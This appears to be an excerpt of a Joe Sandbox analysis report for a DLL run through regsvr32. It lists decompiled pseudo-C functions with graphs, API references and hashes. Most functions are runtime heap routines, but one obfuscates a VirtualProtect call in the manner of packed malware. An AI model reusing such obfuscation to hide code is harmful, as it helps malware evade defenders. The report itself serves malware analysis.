                                                                                                            control_flow_graph 178 1001382a-10013842 call 10012514 181 10013845-1001384d 178->181 182 10013844 178->182 183 100138b4-100138b6 181->183 184 1001384f-10013856 181->184 182->181 185 100138b8-100138be 183->185 186 100138dd 183->186 187 10013858-1001386a 184->187 188 1001389f-100138a1 184->188 185->186 191 100138c0-100138c9 call 10014676 185->191 189 100138df-100138e4 call 1001254f 186->189 187->188 192 1001386c-1001388f call 10013a38 call 1001437a call 100138d4 187->192 188->186 190 100138a3-100138b2 RtlAllocateHeap 188->190 190->183 191->181 200 100138cf 191->200 192->190 204 10013891-1001389c call 10011c50 192->204 200->189 204->188
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E1001382A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				long _t23;
				long _t31;
				void* _t33;
				void* _t34;
				void* _t40;

				_push(0x10);
				_push(0x10041e40);
				E10012514(__ebx, __edi, __esi);
				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
				 *(_t33 - 0x20) = _t31;
				if(_t31 == 0) {
					_t31 = _t31 + 1;
				}
				do {
					_t28 = 0;
					 *(_t33 - 0x1c) = 0;
					if(_t31 > 0xffffffe0) {
						L9:
						if(_t28 != 0 ||  *0x1004f58c == _t28) {
							L13:
							_t15 = _t28;
							L14:
							return E1001254F(_t15);
						} else {
							goto L11;
						}
					}
					if( *0x10050a64 != 3) {
						L7:
						if(_t28 != 0) {
							goto L13;
						}
						L8:
						_t17 = RtlAllocateHeap( *0x10050a60, 8, _t31); // executed
						_t28 = _t17;
						goto L9;
					}
					_t31 = _t31 + 0x0000000f & 0xfffffff0;
					 *(_t33 + 0xc) = _t31;
					_t23 =  *(_t33 - 0x20);
					_t40 = _t23 -  *0x10050a50; // 0x0
					if(_t40 > 0) {
						goto L7;
					}
					E10013A38(_t23, 0, 4);
					 *(_t33 - 4) =  *(_t33 - 4) & 0;
					_push(_t23);
					 *(_t33 - 0x1c) = E1001437A();
					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
					E100138D4();
					_t28 =  *(_t33 - 0x1c);
					if(_t28 == 0) {
						goto L8;
					}
					E10011C50(_t28, 0,  *(_t33 - 0x20));
					_t34 = _t34 + 0xc;
					goto L7;
					L11:
				} while (E10014676(_t31) != 0);
				goto L14;
			}









                                                                                                            0x1001382a
                                                                                                            0x1001382c
                                                                                                            0x10013831
                                                                                                            0x10013839
                                                                                                            0x1001383d
                                                                                                            0x10013842
                                                                                                            0x10013844
                                                                                                            0x10013844
                                                                                                            0x10013845
                                                                                                            0x10013845
                                                                                                            0x10013847
                                                                                                            0x1001384d
                                                                                                            0x100138b4
                                                                                                            0x100138b6
                                                                                                            0x100138dd
                                                                                                            0x100138dd
                                                                                                            0x100138df
                                                                                                            0x100138e4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100138b6
                                                                                                            0x10013856
                                                                                                            0x1001389f
                                                                                                            0x100138a1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100138a3
                                                                                                            0x100138ac
                                                                                                            0x100138b2
                                                                                                            0x00000000
                                                                                                            0x100138b2
                                                                                                            0x1001385b
                                                                                                            0x1001385e
                                                                                                            0x10013861
                                                                                                            0x10013864
                                                                                                            0x1001386a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001386e
                                                                                                            0x10013874
                                                                                                            0x10013877
                                                                                                            0x1001387e
                                                                                                            0x10013881
                                                                                                            0x10013885
                                                                                                            0x1001388a
                                                                                                            0x1001388f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10013897
                                                                                                            0x1001389c
                                                                                                            0x00000000
                                                                                                            0x100138c0
                                                                                                            0x100138c7
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 1001386E
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 4078605025-0
                                                                                                            • Opcode ID: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                                                            • Instruction ID: 7e3eb1e6f8f5fb1ab58181eb2bcb74cf9bd6752373f8cd469f9ee3675e8c65d6
                                                                                                            • Opcode Fuzzy Hash: ca4ade39cfe2bb7f42d2cea73e663cfd7cd34fc626ac2018776e906fd1e55983
                                                                                                            • Instruction Fuzzy Hash: D711EF36D0076A9ADB01DBA48C41B9DB771FF807A0F12811AFC646F2E1DF34D9808B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100107C8 Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 207 100107c8-100107d9 call 10012514 210 10010833-10010838 call 1001254f 207->210 211 100107db-100107e2 207->211 213 10010824 211->213 214 100107e4-100107fc call 10013a38 call 10013b9b 211->214 217 10010825-1001082d RtlFreeHeap 213->217 221 10010807-10010814 call 1001081b 214->221 222 100107fe-10010806 call 10013bc6 214->222 217->210 221->210 227 10010816-10010819 221->227 222->221 227->217
                                                                                                            C-Code - Quality: 18%
                                                                                                            			E100107C8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _t9;
				intOrPtr _t12;
				intOrPtr _t21;
				void* _t22;

				_push(0xc);
				_push(0x10041d10);
				_t9 = E10012514(__ebx, __edi, __esi);
				_t21 =  *((intOrPtr*)(_t22 + 8));
				if(_t21 != 0) {
					if( *0x10050a64 != 3) {
						_push(_t21);
						goto L7;
					} else {
						E10013A38(__ebx, __edi, 4);
						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
						_t12 = E10013B9B(_t21);
						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
						if(_t12 != 0) {
							_push(_t21);
							_push(_t12);
							E10013BC6();
						}
						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
						_t9 = E1001081B();
						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t22 + 8)));
							L7:
							_push(0);
							_t9 = RtlFreeHeap( *0x10050a60); // executed
						}
					}
				}
				return E1001254F(_t9);
			}







                                                                                                            0x100107c8
                                                                                                            0x100107ca
                                                                                                            0x100107cf
                                                                                                            0x100107d4
                                                                                                            0x100107d9
                                                                                                            0x100107e2
                                                                                                            0x10010824
                                                                                                            0x00000000
                                                                                                            0x100107e4
                                                                                                            0x100107e6
                                                                                                            0x100107ec
                                                                                                            0x100107f1
                                                                                                            0x100107f7
                                                                                                            0x100107fc
                                                                                                            0x100107fe
                                                                                                            0x100107ff
                                                                                                            0x10010800
                                                                                                            0x10010806
                                                                                                            0x10010807
                                                                                                            0x1001080b
                                                                                                            0x10010814
                                                                                                            0x10010816
                                                                                                            0x10010825
                                                                                                            0x10010825
                                                                                                            0x1001082d
                                                                                                            0x1001082d
                                                                                                            0x10010814
                                                                                                            0x100107e2
                                                                                                            0x10010838

                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 100107E6
                                                                                                              • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterFreeHeapSection__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3012239193-0
                                                                                                            • Opcode ID: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                                                            • Instruction ID: e2f95eda502a26e356ba5135cb18e14e48cd53293581a9dd67e0285628cf36ea
                                                                                                            • Opcode Fuzzy Hash: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                                                            • Instruction Fuzzy Hash: C0F09635D0A215AAEB10DB60CC46B4E3B64EF00760F208014F5906D0D1DF74E5C0CAD5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001070F Relevance: 3.0, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 228 1001070f-10010725 call 10012514 231 10010755-10010757 228->231 232 10010727-1001072d 228->232 233 10010759 231->233 234 1001075a-10010761 231->234 232->231 235 1001072f-10010753 call 10013a38 call 1001437a call 10010781 232->235 233->234 236 10010763-10010766 234->236 237 10010769-10010772 RtlAllocateHeap 234->237 235->231 240 10010778-1001077d call 1001254f 235->240 236->237 237->240
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E1001070F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t21;
				void* _t24;

				_push(0xc);
				_push(0x10041d00);
				E10012514(__ebx, __edi, __esi);
				_t19 =  *(_t21 + 8);
				if( *0x10050a64 != 3) {
					L3:
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					if( *0x10050a64 != 1) {
						_t19 = _t19 + 0x0000000f & 0xfffffff0;
					}
					_t9 = RtlAllocateHeap( *0x10050a60, 0, _t19); // executed
				} else {
					_t24 = _t19 -  *0x10050a50; // 0x0
					if(_t24 > 0) {
						goto L3;
					} else {
						E10013A38(__ebx, __edi, 4);
						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
						_push(_t19);
						 *(_t21 - 0x1c) = E1001437A();
						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
						E10010781();
						_t9 =  *(_t21 - 0x1c);
						if( *(_t21 - 0x1c) == 0) {
							goto L3;
						}
					}
				}
				return E1001254F(_t9);
			}






                                                                                                            0x1001070f
                                                                                                            0x10010711
                                                                                                            0x10010716
                                                                                                            0x1001071b
                                                                                                            0x10010725
                                                                                                            0x10010755
                                                                                                            0x10010757
                                                                                                            0x10010759
                                                                                                            0x10010759
                                                                                                            0x10010761
                                                                                                            0x10010766
                                                                                                            0x10010766
                                                                                                            0x10010772
                                                                                                            0x10010727
                                                                                                            0x10010727
                                                                                                            0x1001072d
                                                                                                            0x00000000
                                                                                                            0x1001072f
                                                                                                            0x10010731
                                                                                                            0x10010737
                                                                                                            0x1001073b
                                                                                                            0x10010742
                                                                                                            0x10010745
                                                                                                            0x10010749
                                                                                                            0x1001074e
                                                                                                            0x10010753
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10010753
                                                                                                            0x1001072d
                                                                                                            0x1001077d

                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 10010731
                                                                                                              • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,10041D00,0000000C,1001079A,000000E0,100107C5,?,100139BB,00000018,10041E50,00000008,10013A51,?,?), ref: 10010772
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCriticalEnterHeapSection__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 409319249-0
                                                                                                            • Opcode ID: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                                                            • Instruction ID: 42b023ab18c65cc465c375f16582ad1359b716bf9f3aedd515ba29da9f54a78b
                                                                                                            • Opcode Fuzzy Hash: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                                                            • Instruction Fuzzy Hash: 1DF06D75E45665ABEB10EB708C4AB8D7BB4FB003A1F150114F9A1AE1E1D7B0BAC08E95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10013A83 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 247 10013a83-10013aa1 HeapCreate 248 10013aa3-10013ab0 call 10013a69 247->248 249 10013acd-10013acf 247->249 252 10013ad0-10013ad3 248->252 253 10013ab2-10013abf call 10013b53 248->253 253->252 256 10013ac1-10013ac7 HeapDestroy 253->256 256->249
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10013A83(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10050a60 = _t6;
				if(_t6 == 0) {
					L4:
					return 0;
				} else {
					_t8 = E10013A69();
					 *0x10050a64 = _t8;
					if(_t8 != 3 || E10013B53(0x3f8) != 0) {
						return 1;
					} else {
						HeapDestroy( *0x10050a60);
						goto L4;
					}
				}
			}





                                                                                                            0x10013a94
                                                                                                            0x10013a9c
                                                                                                            0x10013aa1
                                                                                                            0x10013acd
                                                                                                            0x10013acf
                                                                                                            0x10013aa3
                                                                                                            0x10013aa3
                                                                                                            0x10013aab
                                                                                                            0x10013ab0
                                                                                                            0x10013ad3
                                                                                                            0x10013ac1
                                                                                                            0x10013ac7
                                                                                                            0x00000000
                                                                                                            0x10013ac7
                                                                                                            0x10013ab0

                                                                                                            APIs
                                                                                                            • HeapCreate.KERNEL32(00000000,00001000,00000000,10011217,00000001,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013A94
                                                                                                              • Part of subcall function 10013B53: HeapAlloc.KERNEL32(00000000,00000140,10013ABC,000003F8,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B60
                                                                                                            • HeapDestroy.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013AC7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocCreateDestroy
                                                                                                            • String ID:
                                                                                                            • API String ID: 2236781399-0
                                                                                                            • Opcode ID: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                                                            • Instruction ID: e8a57e519fdf56151fc66cac883b31846c607769bf618c359d49edee3f1857a7
                                                                                                            • Opcode Fuzzy Hash: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                                                            • Instruction Fuzzy Hash: 6BE01A74A953559EEB01EB718C45B1A37E4EB44682F488829F442CD4A1EB70D680A602
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10003310 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 257 10003310-10003320 258 10003322-1000332a 257->258 259 1000332b-10003374 257->259 260 100033fa-100034e1 259->260 261 1000337a-10003387 259->261 262 10003500-1000356c VirtualProtect 260->262 263 100034e3-100034fc 260->263 264 10003389-1000338e 261->264 265 100033ed-100033f9 261->265 263->262 266 10003390-1000339c 264->266 267 100033cd-100033ea 264->267 266->267 268 1000339e-100033cb 266->268 267->265 268->265 268->267
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E10003310() {
				long _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr _t91;
				signed int _t101;
				signed int _t116;
				signed int _t122;
				intOrPtr _t126;
				signed int _t127;
				signed int _t132;
				signed int _t135;
				intOrPtr* _t137;
				intOrPtr* _t141;
				signed int _t150;
				signed int _t158;
				signed int _t165;
				signed int _t175;
				signed int _t186;
				signed int _t216;
				signed int _t223;
				signed int _t227;
				intOrPtr _t235;
				signed int _t238;
				void* _t239;

				_t80 =  *(_t239 + 0x18);
				_t126 =  *((intOrPtr*)(_t80 + 8));
				 *((intOrPtr*)(_t239 + 8)) = _t126;
				if(_t126 != 0) {
					_t132 =  *(_t80 + 0xc);
					_t127 =  *0x1004b0dc; // 0x0
					_t5 = _t127 + 1; // 0x1
					_t101 =  *0x1004b0ec; // 0x0
					_t165 =  *0x1004b0e0; // 0x0
					_t7 = _t165 + 0x1000000; // 0x1000000
					_t83 =  *0x1004b0e4; // 0x0
					_t150 =  *0x1004b0d8; // 0x0
					 *(_t239 + 0x10) = _t132;
					if((_t132 & _t83 * 0x7fffffff + _t165 + _t7 - _t5 * _t127 + _t101 + _t150 << 0x00000001) == 0) {
						_t35 = _t83 * _t165 + 1; // 0x1
						 *(_t239 + 0x1c) = _t83 * _t165;
						_t135 =  *0x1004b0e8; // 0x0
						asm("sbb ebp, ebp");
						asm("sbb edi, edi");
						_t216 =  *0x1004b0d8; // 0x0
						_t223 =  *0x1004b0d8; // 0x0
						asm("sbb esi, esi");
						_t158 =  *0x1004b0ec; // 0x0
						 *(_t239 + 0x14) =  *(0x1004b0f4 + ( ~( ~(_t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 + _t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 - 0x80000000 &  *(_t239 + 0x10))) + ( ~( ~(0x40000000 + ((_t35 * 0x3fffffff + _t135) * _t127 + (_t135 * _t165 + 0x00000001) * _t150) * 0x00000004 &  *(_t239 + 0x10))) +  ~( ~(_t150 + _t135 * 0x00000002 + _t135 + _t150 + _t135 * 0x00000002 + _t135 + 0x20000000 &  *(_t239 + 0x10))) * 2) * 2) * 4);
						_t175 =  *0x1004b0e0; // 0x0
						_t116 = _t158 * _t127;
						if(( *(_t239 + 0x10) & (_t116 * _t127 + _t116 * _t127 * 0x00000002 - 0x00000006) * _t127 + _t175 + _t175 - _t135 - _t158 + _t83 + _t223 + (_t175 + _t175 - _t135 - _t158 + _t83 + _t223) * 0x00000002 + 0x04000000) != 0) {
							 *(_t239 + 0x14) =  *(_t239 + 0x14) | _t158 * _t83 *  *0x1004b0e0 + 0x00000200 + _t158 * _t83 *  *0x1004b0e0 * 0x00000002;
						}
						_t186 =  *0x1004b0e0; // 0x0
						_t227 = _t158 * 0x3fffffff;
						_t122 =  *0x1004b0d8; // 0x0
						_t74 = _t227 + 1; // 0x1
						_t87 = VirtualProtect( *( *(_t239 + 0x30)),  *((intOrPtr*)(_t239 + 0x20)) + (_t83 * 0x3fffffff + (_t122 + _t74) * _t186 + _t122 + (2 -  *((intOrPtr*)(_t239 + 0x24)) - _t135 - _t158) * _t127) * 4,  *(_t239 + 0x18), _t239 + 0x28 + ((_t116 + _t135) * _t158 + _t186) * 8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t87);
					} else {
						_t137 =  *((intOrPtr*)(_t239 + 0x28));
						_t235 =  *_t137;
						 *((intOrPtr*)(_t239 + 0x28)) = _t235;
						if(_t235 ==  *((intOrPtr*)(_t137 + 4))) {
							if( *((intOrPtr*)(_t137 + 0x10)) != 0) {
								L7:
								_t91 =  *((intOrPtr*)(_t239 + 0x24));
								 *((intOrPtr*)(_t91 + 0x20))( *(_t239 + 0x30),  *(_t239 + 0x1c), 0x4000 - _t101,  *((intOrPtr*)(_t91 + 0x34)));
							} else {
								_t141 =  *((intOrPtr*)(_t239 + 0x24));
								_t238 =  *(_t141 + 0x3c);
								if( *((intOrPtr*)( *_t141 + 0x38)) == _t238 || (_t150 + 2) * _t101 + _t83 + _t165 * 2 + ((_t150 + 2) * _t101 + _t83 + _t165 * 2) * 2 - (_t83 * _t127 * _t127 + 3 + _t83 * _t127 * _t127 * 2) *  *0x1004b0e8 +  *(_t239 + 0x18) % _t238 == 0) {
									goto L7;
								}
							}
						}
						return 1;
					}
				} else {
					return 1;
				}
			}



























                                                                                                            0x10003313
                                                                                                            0x10003317
                                                                                                            0x1000331c
                                                                                                            0x10003320
                                                                                                            0x1000332b
                                                                                                            0x1000332e
                                                                                                            0x10003334
                                                                                                            0x1000333b
                                                                                                            0x10003343
                                                                                                            0x1000334a
                                                                                                            0x10003353
                                                                                                            0x10003364
                                                                                                            0x10003370
                                                                                                            0x10003374
                                                                                                            0x100033ff
                                                                                                            0x10003408
                                                                                                            0x1000340c
                                                                                                            0x10003433
                                                                                                            0x10003447
                                                                                                            0x1000344f
                                                                                                            0x10003492
                                                                                                            0x10003498
                                                                                                            0x100034a6
                                                                                                            0x100034ac
                                                                                                            0x100034b0
                                                                                                            0x100034be
                                                                                                            0x100034e1
                                                                                                            0x100034fc
                                                                                                            0x100034fc
                                                                                                            0x10003500
                                                                                                            0x10003515
                                                                                                            0x10003525
                                                                                                            0x1000352b
                                                                                                            0x10003559
                                                                                                            0x10003563
                                                                                                            0x1000356c
                                                                                                            0x1000337a
                                                                                                            0x1000337a
                                                                                                            0x1000337e
                                                                                                            0x10003383
                                                                                                            0x10003387
                                                                                                            0x1000338e
                                                                                                            0x100033cd
                                                                                                            0x100033cd
                                                                                                            0x100033e7
                                                                                                            0x10003390
                                                                                                            0x10003390
                                                                                                            0x10003394
                                                                                                            0x1000339c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000339c
                                                                                                            0x1000338e
                                                                                                            0x100033f9
                                                                                                            0x100033f9
                                                                                                            0x10003322
                                                                                                            0x1000332a
                                                                                                            0x1000332a

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                                                            • Instruction ID: 1dc449bc3d80b5784a3a7ae21000a0fc3896a9c870339c3573936ee24331a343
                                                                                                            • Opcode Fuzzy Hash: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                                                            • Instruction Fuzzy Hash: 1A7129335043298FD314DF58C9C1646B7E9FB89310F058A2EDD699B3A5E670FE098AC4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10037855 Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 270 10037855-10037867 call 10011bf0 273 10037897-100378a8 call 10037552 270->273 274 10037869-10037871 270->274 283 100378aa-100378b8 call 10037732 273->283 284 100378bd-100378cc 273->284 276 10037873-1003788a call 1003768d 274->276 277 10037890 call 10037446 274->277 276->277 282 10037895 277->282 282->273 283->284
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E10037855(intOrPtr* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				signed char* _t15;
				long* _t17;
				long* _t19;
				intOrPtr _t23;
				intOrPtr* _t26;
				void* _t28;

				E10011BF0(0x1003aa13, _t28);
				_push(__ecx);
				_t26 = __ecx;
				if( *__ecx == 0) {
					_t20 =  *0x1004eff0; // 0x1004eff4
					if(_t20 == 0) {
						 *((intOrPtr*)(_t28 - 0x10)) = 0x1004eff4;
						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
						_t15 = E1003768D(0x1004eff4);
						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
						_t20 = _t15;
						 *0x1004eff0 = _t15; // executed
					}
					_t14 = E10037446(_t20); // executed
					 *_t26 = _t14;
				}
				_t17 =  *0x1004eff0; // 0x1004eff4
				_t23 = E10037552(_t17,  *_t26);
				if(_t23 == 0) {
					_t12 =  *((intOrPtr*)(_t28 + 8))();
					_t19 =  *0x1004eff0; // 0x1004eff4
					_t23 = _t12;
					E10037732(_t19,  *_t26, _t23);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t23;
			}











                                                                                                            0x1003785a
                                                                                                            0x1003785f
                                                                                                            0x10037861
                                                                                                            0x10037867
                                                                                                            0x10037869
                                                                                                            0x10037871
                                                                                                            0x10037878
                                                                                                            0x1003787b
                                                                                                            0x1003787f
                                                                                                            0x10037884
                                                                                                            0x10037888
                                                                                                            0x1003788a
                                                                                                            0x1003788a
                                                                                                            0x10037890
                                                                                                            0x10037895
                                                                                                            0x10037895
                                                                                                            0x10037899
                                                                                                            0x100378a4
                                                                                                            0x100378a8
                                                                                                            0x100378aa
                                                                                                            0x100378ad
                                                                                                            0x100378b3
                                                                                                            0x100378b8
                                                                                                            0x100378b8
                                                                                                            0x100378c4
                                                                                                            0x100378cc

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1003785A
                                                                                                              • Part of subcall function 1003768D: TlsAlloc.KERNEL32(?,10037884,?,?,?,100373C4,100347FD,100071DC), ref: 100376AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
